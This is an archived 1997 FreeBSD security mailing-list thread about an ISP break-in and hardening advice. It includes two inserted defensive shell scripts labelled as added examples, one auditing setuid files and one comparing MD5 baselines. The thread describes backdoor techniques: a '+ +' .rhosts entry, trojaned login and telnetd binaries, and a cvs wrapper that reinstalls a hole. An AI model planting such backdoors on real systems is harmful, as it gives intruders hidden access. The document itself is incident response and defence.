From owner-freebsd-security Mon Jul 28 12:55:08 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA28129 for security-outgoing; Mon, 28 Jul 1997 12:55:08 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA28122 for ; Mon, 28 Jul 1997 12:55:05 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id PAA12919 for ; Mon, 28 Jul 1997 15:54:27 GMT Date: Mon, 28 Jul 1997 15:54:26 +0000 (GMT)
From: "Jonathan A. Zdziarski" To: security@freebsd.org Subject: security hole in FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

I'm a little paranoid, as somebody hacked our system about a month ago and said he would do it again. Where is the source code for /bin/login? I've checked /usr/src; the only thing I find is /usr/src/contrib/cvs/src/login.c and contrib/opie/libopie/login.c, but that doesn't seem right.

-------------------------------------------------------------------------
Jonathan A. Zdziarski NetRail Incorporated
Server Engineering Manager 230 Peachtree St. Suite 500
jonz@netrail.net Atlanta, GA 30303
http://www.netrail.net (888) - NETRAIL
-------------------------------------------------------------------------

From owner-freebsd-security Mon Jul 28 12:55:26 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA28158 for security-outgoing; Mon, 28 Jul 1997 12:55:26 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA28152 for ; Mon, 28 Jul 1997 12:55:24 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05794; Mon, 28 Jul 1997 12:55:14 -0700 (PDT) Date: Mon, 28 Jul 1997 12:55:13 -0700 (PDT)
From: Vincent Poy
To: "Jonathan A. Zdziarski"
Cc: Ollivier Robert, security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:

=)I would check also /etc/inetd.conf to make sure he didn't set himself up
=)with a root-environment on some port, I know finger -P will let you run
=)for example a shell, and if it is set up as root, well...

The inetd.conf file was unaltered; I checked that already.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 12:58:14 1997
Date: Mon, 28 Jul 1997 12:56:33 -0700 (PDT)
From: Vincent Poy
To: Robert Watson
Cc: Guido van Rooij, loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Robert Watson wrote:

=)> What does the -s do anyways? I know it means secure but isn't it
=)> supposed to be secure already out of the box?
=)
=)-s prevents syslogd from accepting network log messages. Without
=)it, anyone who can deliver a packet to the syslog port using UDP can add a
=)line to your system logs. When you add entries to syslog.conf like this:
=)
=)*.error @loghost.domain
=)
=)you rely on not having the -s flag set.
=)
=)Allowing log messages from unauthorized hosts is a security problem, as
=)someone can insert fictitious messages (often-times, spoofed), flood your
=)logs, etc.

Never noticed this one; was there a reason FreeBSD shipped with -s off by
default?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 13:09:21 1997
From: Adam Shostack
To: vince@mail.MCESTATE.COM (Vincent Poy)
Cc: langfod@dihelix.com, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net
Subject: Re: security hole in FreeBSD
In-Reply-To: from Vincent Poy at "Jul 28, 97 12:29:43 pm"
Date: Mon, 28 Jul 1997 16:04:51 -0400 (EDT)
Message-Id: <199707282004.QAA07078@homeport.org>

Vincent Poy wrote:
| =)My suggestion to you would be to get a clean source tree, recompile everything
| =)and install tripwire.
|
| I'll do that as soon as the machine comes back up. I heard that
| suid programs can be a problem too but which ones are required to be suid?

su really should be setuid. Everything else is debatable. My
advice is to turn off all setuid bits except those you know you need
(possibly w, who, ps, ping, at, passwd)

find / -xdev -perm -4000 -ok chmod u-s {} \;
find /usr -xdev -perm -4000 -ok chmod u-s {} \;
find / -xdev -perm -2000 -ok chmod g-s {} \;
find /usr -xdev -perm -2000 -ok chmod g-s {} \;
# The semicolons are part of the line

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From owner-freebsd-security Mon Jul 28 13:46:34 1997
Date: Mon, 28 Jul 1997 16:46:01 -0400 (EDT)
From: Robert Watson
To: Vincent Poy
Cc: Tomasz Dudziak, security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Robert Watson wrote:
>
> Yep, sniffing would work but can they actually sniff outside of
> the network?

Well, once you have one host, you have all the hosts on the same ethernet
segment. Typically, though, problems with sniffing occur on college dorm
networks, which run large numbers of less-well-managed Linux/etc hosts.
This may be an increasing problem on cable-modem networks, which I
understand work something like Ethernet, in that they are broadcast
networks for a local segment. Also, who is to say that occasionally
routers or ISP machines don't get broken into, and sniffing occurs? Any
of your users could be logging in from an untrusted network, so in essence
you are relying on that network to be secure as well as your own.

> =)Your best hope at this point is to shut down the system, boot on a floppy
> =)with a CDROM mounted, and then do a strategic MD5 checksum of all binaries
> =)and check for changes. If you're running STABLE, your best bet may be to
> =)sup down differences, but to reinstall the binaries necessary to support
> =)the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc.
> =)If he's made enough changes to zap syslog, netstat, login-stuff, I
> =)wouldn't trust any other tools on the system currently.
>
> Not even a rebuild of -current after cvs?

Well, the problem is, I could easily replace cvs with a script that does
cvs, then installs my security hole again.
:)

Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University    http://www.cmu.edu/
Network Security Research, Trusted Information Systems   http://www.tis.com/
Network Administrator, SafePort Network Services         http://www.safeport.com/
robert@fledge.watson.org   rwatson@tis.com   http://www.watson.org/~robert/

From owner-freebsd-security Mon Jul 28 13:55:35 1997
Date: Mon, 28 Jul 1997 16:55:19 -0400 (EDT)
From: Robert Watson
To: Adam Shostack
Cc: Vincent Poy, security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707282004.QAA07078@homeport.org>

On Mon, 28 Jul 1997, Adam Shostack wrote:

> Vincent Poy wrote:
>
> su really should be setuid. Everything else is debatable. My
> advice is to turn off all setuid bits except those you know you need
> (possibly w, who, ps, ping, at, passwd)
>
> find / -xdev -perm -4000 -ok chmod u-s {} \;
> find /usr -xdev -perm -4000 -ok chmod u-s {} \;
> find / -xdev -perm -2000 -ok chmod g-s {} \;
> find /usr -xdev -perm -2000 -ok chmod g-s {} \;
> # The semicolons are part of the line

Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc)
require root access to deliver to local mailboxes; crontab related stuff,
terminal locking, some kerberos commands, local XWindows servers, and su
all rely on suid.

What type of secured environment are you hoping to create? If root access
is only to be used from the console, and shared functions like
xwindows/mailstuff/user crontab aren't needed, you can probably just
disable all the suid-root programs, or suid-anything programs. Look also
at the sgid programs that scan kmem. Ideally, you'd also put the system
in a higher secure level, and mount all partitions non-suid, as long as
login kept working :).

Does login require suid, or does gettytab run it as root anyway?
Robert N Watson

From owner-freebsd-security Mon Jul 28 14:04:01 1997
Date: Mon, 28 Jul 1997 15:00:57 -0600 (MDT)
Message-Id: <199707282100.PAA07719@rocky.mt.sri.com>
From: Nate Williams
To: "Jonathan A. Zdziarski"
Cc: Robert Watson, Vincent Poy, Tomasz Dudziak, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD

> There IS one common hole I've seen apache and stronghold have, and that is
> that some people like to leave their sessiond or httpd files owned by
> 'nobody'. This allows somebody running CGI on that system to replace
> those binaries with their own, hacked binaries (since the scripts are
> usually owned as nobody), and the next time httpd starts, they can make it
> write a root shell, or just about anything along those lines.

If it's running as 'nobody', it can't create a root shell. It can create a
'nobody' shell though...

Nate

From owner-freebsd-security Mon Jul 28 14:15:13 1997
Date: Mon, 28 Jul 1997 17:14:38 -0400 (EDT)
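An added example, not code from anyone in this thread: a POSIX sh audit that reports setuid/setgid files that are not on a site allowlist, rather than stripping every bit the way Adam Shostack's find commands above do, plus the ownership check behind the httpd-owned-by-'nobody' problem Jonathan Zdziarski raised (quoted in Nate Williams's message above). The allowlist is constructed from programs named in this thread, and the directories and service account are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): audit setuid/setgid files against an
# allowlist, and list executables owned by a service account such as 'nobody'.
# The allowlist below is constructed from programs named in the thread; it is
# an illustration, not a statement of what any release needs to keep setuid.
ALLOWED_SUID="su passwd login ping traceroute at crontab ps w who fingerd sendmail mail.local"

# suid_files DIR...
# Print, sorted, every regular file below DIR that carries the setuid (4000)
# or setgid (2000) bit. -xdev keeps find on one filesystem, as in the thread.
suid_files() {
    for d in "$@"; do
        find "$d" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
    done | sort
}

# unexpected_suid DIR...
# Print "UNEXPECTED: path" for each setuid/setgid file whose basename is not
# in ALLOWED_SUID. Returns 0 when nothing unexpected was found, 1 otherwise.
# Review the report by hand before touching anything: a bit stripped from a
# program you rely on (mail delivery, crontab) breaks that function.
# Paths are split on whitespace here, so this assumes paths without spaces.
unexpected_suid() {
    found=0
    for f in $(suid_files "$@"); do
        base=${f##*/}
        case " $ALLOWED_SUID " in
            *" $base "*) ;;                       # on the allowlist, nothing to report
            *) echo "UNEXPECTED: $f"; found=1 ;;
        esac
    done
    return $found
}

# service_owned_executables DIR USER
# Print executables below DIR owned by USER. A daemon binary owned by the
# account it runs as (httpd owned by 'nobody') can be replaced by anything
# already running as that account, which is the hole described in the thread.
service_owned_executables() {
    find "$1" -xdev -type f -user "$2" -perm -100 2>/dev/null | sort
}

# Stand-alone use: audit the directories given on the command line, e.g.
#   sh suid_audit.sh / /usr
if [ $# -gt 0 ]; then
    unexpected_suid "$@"
    echo "--- executables owned by nobody ---"
    service_owned_executables "$1" nobody
fi
```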
From: "Matthew N. Dodd"
To: Vincent Poy
Cc: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Vincent Poy wrote:
> I'll do that as soon as the machine comes back up. I heard that
> suid programs can be a problem too but which ones are required to be suid?

As a general rule I set all suid/sgid system executables schg and run
with securelevel set to 1 or 2.

Getting rid of any unnecessary suid/sgid programs would be good too.

/* Matthew N. Dodd              | A memory retaining a love you had for life
   winter@jurai.net             | As cruel as it seems nothing ever seems to
   http://www.jurai.net/~winter | go right - FLA M 3.1:53 */

From owner-freebsd-security Mon Jul 28 14:18:25 1997
Date: Mon, 28 Jul 1997 02:22:24 -0800
From: "Nicole H."
To: Robert Watson, Vincent Poy
Cc: "[Mario1-]", JbHunt, security@FreeBSD.ORG, Tomasz Dudziak
Subject: Re: security hole in FreeBSD

Does anyone know of a good way to detect people "sniffing" on the network?
I.e. a program that will detect a machine running in promiscuous mode?

Thanks
Nicole

> On Mon, 28 Jul 1997, Robert Watson wrote:
>
> =)> =)I'd be tempted to look in all the normal places -- sendmail, etc. What
> =)> =)daemons were running on the machine? Any web server processes? Also, I'd
> =)> =)heavily suspect that he sniffed a password if no encrypted telnet/ssh is
> =)> =)in use.. Any use of NIS going on? Also, .rhosts arrangements can be
> =)> =)extremely unhappy if we already know (s)he is messing with DNS entries.
> =)>
> =)> sendmail is running as well as apache httpd... ftpd, telnetd, and
> =)> ircd. No NIS. All I know was he managed to change everyone's .rhosts
> =)> file when it didn't exist originally, and the contents just had:
> =)> + +
> =)> in it.
> =)
> =)This guy sounds like either he has good tools, or good experience. For
> =)safety's sake, I'd guess the latter. All he needed was one sniffed
> =)password to get on the system, and then you may be stuck with known holes
> =)in application software. Most of the security problems I've seen have
> =)started with a sniffed password, but this comes from dormitory experience
> =):).
>
> Yep, sniffing would work but can they actually sniff outside of
> the network?
>
> =)Your best hope at this point is to shut down the system, boot on a floppy
> =)with a CDROM mounted, and then do a strategic MD5 checksum of all binaries
> =)and check for changes.
> =)If you're running STABLE, your best bet may be to
> =)sup down differences, but to reinstall the binaries necessary to support
> =)the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc.
> =)If he's made enough changes to zap syslog, netstat, login-stuff, I
> =)wouldn't trust any other tools on the system currently.
>
> Not even a rebuild of -current after cvs?
>
> Cheers,
> Vince - vince@MCESTATE.COM - vince@GAIANET.NET
>
> ---------------End of Original Message-----------------

nicole@mediacity.com        |\ __ /|   (`\           http://www.mediacity.com
Nicole Harrington           | o_o |__  ) )           Phone: 415-237-1464
                            //  \\                   Pager: 415-301-2482
Systems Administrator  ------------------------(((---(((----------------------
*******   *   *****   What do you mean Spelling Errors?
*     *   *     *     My Modem is Error Correcting!

CAUTION: I'm no doctor, I only tell computers what to do. Nothing in this
document should be construed as medical advice. My opinions are subject to
the availability of information. I learn new things each day, and so may
change my opinions. Courtesy is owed. Respect is earned. Love is given.
--
-----------------------------------------------------------------------

From owner-freebsd-security Mon Jul 28 14:31:22 1997
Message-ID: <19970728230758.23621@keltia.freenix.fr>
Date: Mon, 28 Jul 1997 23:07:58 +0200
From: Ollivier Robert
To: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
References: <19970728171633.10794@keltia.freenix.fr>
In-Reply-To: ; from Vincent Poy on Mon, Jul 28, 1997 at 12:49:00PM -0700
X-Operating-System: FreeBSD 3.0-CURRENT ctm#3481 AMD-K6 MMX @ 208 MHz

According to Vincent Poy:
> Nope, when I added perl5 yesterday from the ports tree, I deleted
> the perl5.003 and sperl5.003 that was there after it got updated to
> perl5.00401 and sperl5.00401. Is the /usr/bin/perl vulnerable in any way?

Not if it is CURRENT from later than May. No hole that we know of anyway.

> True but netstat wasn't working anymore after we kicked him off
> the first time and rejected all packets from his ip # when he came back
> on.

LSOF is your friend in case you haven't compiled it yet.

--
Ollivier ROBERT -=- FreeBSD: There are no limits -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #23: Sun Jul 20 18:10:34 CEST 1997

From owner-freebsd-security Mon Jul 28 14:42:53 1997
Message-ID: <19970728164228.19622@Jupiter.Mcs.Net>
Date: Mon, 28 Jul 1997 16:42:28 -0500
From: Karl Denninger
To: Robert Watson
Cc: Adam Shostack, Vincent Poy, security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
References: <199707282004.QAA07078@homeport.org>
In-Reply-To: ; from Robert Watson on Mon, Jul 28, 1997 at 04:55:19PM -0400

On Mon, Jul 28, 1997 at 04:55:19PM -0400, Robert Watson wrote:
> On Mon, 28 Jul 1997, Adam Shostack wrote:
>
> > Vincent Poy wrote:
> >
> > su really should be setuid. Everything else is debatable. My
> > advice is to turn off all setuid bits except those you know you need
> > (possibly w, who, ps, ping, at, passwd)
> >
> > find / -xdev -perm -4000 -ok chmod u-s {} \;
> > find /usr -xdev -perm -4000 -ok chmod u-s {} \;
> > find / -xdev -perm -2000 -ok chmod g-s {} \;
> > find /usr -xdev -perm -2000 -ok chmod g-s {} \;
> > # The semicolons are part of the line
>
> Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc)
> require root access to deliver to local mailboxes; crontab related stuff,
> terminal locking, some kerberos commands, local XWindows servers, and su
> all rely on suid.
>
> What type of secured environment are you hoping to create? If root access
> is only to be used from the console, and shared functions like
> xwindows/mailstuff/user crontab aren't needed, you can probably just
> disable all the suid-root programs, or suid-anything programs. Look also
> at the sgid programs that scan kmem. Ideally, you'd also put the system
> in a higher secure level, and mount all partitions non-suid, as long as
> login kept working :).
>
> Does login require suid, or does gettytab run it as root anyway?
>
> Robert N Watson

If you take the SUID off login it works fine, PROVIDED you don't try to use
it to "re-login" (a rather common thing for Berzerkelyoids to do).
--
--
Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity
http://www.mcs.net/~karl     | T1's from $600 monthly to FULL DS-3 Service
                             | 99 Analog numbers, 77 ISDN, http://www.mcs.net/
Voice: [+1 312 803-MCS1 x219]| NOW Serving 56kbps DIGITAL on our analog lines!
Fax:   [+1 312 803-4929]     | 2 FULL DS-3 Internet links; 400Mbps B/W Internal

From owner-freebsd-security Mon Jul 28 14:44:44 1997
Date: Mon, 28 Jul 1997 14:44:14 -0700 (PDT)
From: Vincent Poy
To: "[Mario1-]"
Cc: JbHunt, Robert Watson, Tomasz Dudziak, security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, [Mario1-] wrote:

=)On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:
=)
=): There IS one common hole I've seen apache and stronghold have, and that is
=): that some people like to leave their sessiond or httpd files owned by
=): 'nobody'. This allows somebody running CGI on that system to replace
=): those binaries with their own, hacked binaries (since the scripts are
=): usually owned as nobody), and the next time httpd starts, they can make it
=): write a root shell, or just about anything along those lines.
=)
=)Now THIS is interesting. I was thinking about this a little while ago.
=)Didn't it seem like 'nobody' had an awful lot of processes running
=)last night?

Yes, it did, but they were all httpd, and I understand apache httpd fixed
this security hole a long time ago, since we are using the new version of
apache.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 15:02:14 1997
Date: Mon, 28 Jul 1997 15:01:53 -0700 (PDT)
From: Vincent Poy
To: Adam Shostack
Cc: langfod@dihelix.com, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707282004.QAA07078@homeport.org>

On Mon, 28 Jul 1997, Adam Shostack wrote:

=)Vincent Poy wrote:
=)| =)My suggestion to you would be to get a clean source tree, recompile everything
=)| =)and install tripwire.
=)|
=)| I'll do that as soon as the machine comes back up. I heard that
=)| suid programs can be a problem too but which ones are required to be suid?
=)
=)su really should be setuid. Everything else is debatable. My
=)advice is to turn off all setuid bits except those you know you need
=)(possibly w, who, ps, ping, at, passwd)

Isn't traceroute supposed to be suid also?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 15:07:33 1997
Date: Mon, 28 Jul 1997 15:07:10 -0700 (PDT)
From: Vincent Poy
To: Robert Watson
Cc: Tomasz Dudziak, security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Robert Watson wrote:

=)On Mon, 28 Jul 1997, Vincent Poy wrote:
=)
=)> On Mon, 28 Jul 1997, Robert Watson wrote:
=)>
=)> Yep, sniffing would work but can they actually sniff outside of
=)> the network?
=)
=)Well, once you have one host, you have all the hosts on the same ethernet
=)segment. Typically, though, problems with sniffing occur on college dorm
=)networks, which run large numbers of less-well-managed Linux/etc hosts.
=)This may be an increasing problem on cable-modem networks, which I
=)understand work something like Ethernet, in that they are broadcast
=)networks for a local segment. Also, who is to say that occasionally
=)routers or ISP machines don't get broken into, and sniffing occurs? Any
=)of your users could be logging in from an untrusted network, so in essence
=)you are relying on that network to be secure as well as your own.

That would be true, but it seems the attacker can only get into the
FreeBSD-current machines and not the other ones running 2.1.7.1R or 2.2.2R.
Of course the -current machines are the ones that really run the ISP. The
T1 line directly terminates in the house, so no one local would packet
sniff it, and it would be foolish to do so since they can just boot in
single user mode. Of course routers can be broken into, or even our backbone
provider CRL's. We're running a FreeBSD 2.1.7R based router with an ET card
and the hacker never made it into the machine.

=)> =)Your best hope at this point is to shut down the system, boot on a floppy
=)> =)with a CDROM mounted, and then do a strategic MD5 checksum of all binaries
=)> =)and check for changes.
=)> =)If you're running STABLE, your best bet may be to
=)> =)sup down differences, but to reinstall the binaries necessary to support
=)> =)the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc.
=)> =)If he's made enough changes to zap syslog, netstat, login-stuff, I
=)> =)wouldn't trust any other tools on the system currently.
=)>
=)> Not even a rebuild of -current after cvs?
=)
=)Well, the problem is, I could easily replace cvs with a script that does
=)cvs, then installs my security hole again. :)

True, but if it sups from hub.FreeBSD.ORG, how would you forge it?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 15:10:45 1997
To: Vincent Poy
Cc: security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 03:19:55 PDT."
Date: Mon, 28 Jul 1997 15:10:35 -0700
Message-ID: <4908.870127835@time.cdrom.com>
From: "Jordan K. Hubbard"

I think you are describing the symptom, not the problem. This looks very
much like a system which was broken into and then trojan'd to allow easier,
more invisible access. How do you know, for example, that your telnetd is
really telnetd? Did you verify that? ;)

Also, I'd check that inetd.conf file again and make _really sure_ you
haven't left remote shell access enabled - a lot of people miss that
because it's not explicitly labelled "rlogin" like they might expect.

                                        Jordan

From owner-freebsd-security Mon Jul 28 15:26:30 1997
Date: Mon, 28 Jul 1997 15:26:12 -0700 (PDT)
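An added example, not code from anyone in this thread: a POSIX sh version of the clean-media MD5 check Robert Watson describes earlier in the thread, which is also one way to answer Jordan Hubbard's question above of whether telnetd is still telnetd. It assumes a trusted copy of the tree (a mounted CDROM or a fresh install) is available to build the baseline from; all paths are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): build an MD5 baseline from a tree you
# trust, then compare the running system's tree against it. Digests come from
# md5(1) on FreeBSD and md5sum(1) elsewhere. All paths are assumptions.
LC_ALL=C; export LC_ALL          # fixed collation so sort and comm agree

# md5_of FILE -> hex digest of FILE on stdout
md5_of() {
    if command -v md5 >/dev/null 2>&1; then
        md5 -q "$1"
    else
        md5sum "$1" | cut -d' ' -f1
    fi
}

# make_baseline TRUSTED_ROOT OUTFILE
# Write "digest ./relative/path" for every regular file under TRUSTED_ROOT,
# sorted by path. Run this against the clean tree and keep OUTFILE somewhere
# the suspect host cannot write to (removable media, another machine).
make_baseline() {
    ( cd "$1" && find . -xdev -type f | sort | while read -r f; do
        printf '%s %s\n' "$(md5_of "$f")" "$f"
    done ) > "$2"
}

# compare_baseline BASELINE LIVE_ROOT
# Print one line per discrepancy: ADDED (present now, absent from the
# baseline), MISSING (in the baseline, gone now) or CHANGED (digest differs).
# Returns 0 when the live tree matches the baseline exactly, 1 otherwise.
# This catches a replaced telnetd or login only if sh, find and md5 used to
# run it come from trusted media too; the thread's point is not to trust
# tools on the suspect system itself.
compare_baseline() {
    base=$1; root=$2
    tmp=$(mktemp -d) || return 2
    cut -d' ' -f2- "$base" | sort > "$tmp/expected"
    ( cd "$root" && find . -xdev -type f | sort ) > "$tmp/live"
    # paths that exist only in the live tree
    comm -13 "$tmp/expected" "$tmp/live" | sed 's/^/ADDED /' > "$tmp/findings"
    # paths in the baseline: missing now, or present with a different digest
    while read -r digest f; do
        if [ ! -f "$root/$f" ]; then
            echo "MISSING $f"
        elif [ "$(cd "$root" && md5_of "$f")" != "$digest" ]; then
            echo "CHANGED $f"
        fi
    done < "$base" >> "$tmp/findings"
    cat "$tmp/findings"
    if [ -s "$tmp/findings" ]; then rc=1; else rc=0; fi
    rm -rf "$tmp"
    return $rc
}

# Stand-alone use:
#   sh md5check.sh baseline /cdrom baseline.md5     (from the clean tree)
#   sh md5check.sh compare  baseline.md5 /          (against the live system)
case "${1:-}" in
    baseline) make_baseline "$2" "$3" ;;
    compare)  compare_baseline "$2" "$3" ;;
esac
```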
From: Vincent Poy
To: Robert Watson
Cc: Adam Shostack, security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Robert Watson wrote:

=)Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc)
=)require root access to deliver to local mailboxes; crontab related stuff,
=)terminal locking, some kerberos commands, local XWindows servers, and su
=)all rely on suid.

That's what I thought. I think even fingerd needs suid.

=)What type of secured environment are you hoping to create? If root access
=)is only to be used from the console, and shared functions like
=)xwindows/mailstuff/user crontab aren't needed, you can probably just
=)disable all the suid-root programs, or suid-anything programs. Look also
=)at the sgid programs that scan kmem. Ideally, you'd also put the system
=)in a higher secure level, and mount all partitions non-suid, as long as
=)login kept working :).

Hmmm, but what about root access by using su?

=)Does login require suid, or does gettytab run it as root anyway?

I think it does.
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:28:48 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA08022 for security-outgoing; Mon, 28 Jul 1997 15:28:48 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA08017 for ; Mon, 28 Jul 1997 15:28:44 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06438; Mon, 28 Jul 1997 15:28:38 -0700 (PDT) Date: Mon, 28 Jul 1997 15:28:38 -0700 (PDT) 
From: Vincent Poy
To: "Matthew N. Dodd"
cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]"
Subject: Re: security hole in FreeBSD
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Matthew N. Dodd wrote:

=)On Mon, 28 Jul 1997, Vincent Poy wrote:
=)> 	I'll do that as soon as the machine comes back up. I heard that
=)> suid programs can be a problem too but which ones are required to be suid?
=)
=)As a general rule I set all suid/sgid system executables schg and run
=)with securelevel set to 1 or 2.
=)
=)Getting rid of any unnecessary suid/sgid programs would be good too.

	That wouldn't do any good if the user can chflags noschg on the
binaries you have schg on.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 15:30:45 1997
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA08160 for security-outgoing; Mon, 28 Jul 1997 15:30:45 -0700 (PDT)
Received: from sasami.jurai.net (winter@sasami.jurai.net [207.96.1.17]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA08153 for ; Mon, 28 Jul 1997 15:30:42 -0700 (PDT)
Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.5/8.8.5) with SMTP id SAA27550; Mon, 28 Jul 1997 18:30:29 -0400 (EDT)
Date: Mon, 28 Jul 1997 18:30:28 -0400 (EDT)
From: "Matthew N. Dodd"
To: Vincent Poy
cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]"
Subject: Re: security hole in FreeBSD
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:
> On Mon, 28 Jul 1997, Matthew N. Dodd wrote:
> =)As a general rule I set all suid/sgid system executables schg and run
> =)with securelevel set to 1 or 2.
         ^^^^^^^^^^^^^^^^^^^^^^^^^
> =)
> =)Getting rid of any unnecessary suid/sgid programs would be good too.
>
> 	That wouldn't do any good if the user can chflags noschg on the
> binaries you have schg on.

'man init'

/* Matthew N. Dodd           | A memory retaining a love you had for life
   winter@jurai.net          | As cruel as it seems nothing ever seems to
   http://www.jurai.net/~winter | go right - FLA M 3.1:53 */

From owner-freebsd-security Mon Jul 28 15:31:26 1997
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA08197 for security-outgoing; Mon, 28 Jul 1997 15:31:26 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA08186 for ; Mon, 28 Jul 1997 15:31:19 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06464; Mon, 28 Jul 1997 15:31:13 -0700 (PDT)
Date: Mon, 28 Jul 1997 15:31:12 -0700 (PDT)
From: Vincent Poy
To: "Jonathan A. Zdziarski"
cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]"
Subject: Re: security hole in FreeBSD
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:

=)I'm a little paranoid, as somebody hacked our system about a month ago and
=)said he would do it again. Where is the source code for /bin/login? I've
=)checked /usr/src, the only thing I find is
=)/usr/src/contrib/cvs/src/login.c and contrib/opie/libopie/login.c, but
=)that doesn't seem right.

	Did you ever track down how they replaced the /bin/login?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 15:44:56 1997
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA09160 for security-outgoing; Mon, 28 Jul 1997 15:44:56 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA09150 for ; Mon, 28 Jul 1997 15:44:51 -0700 (PDT)
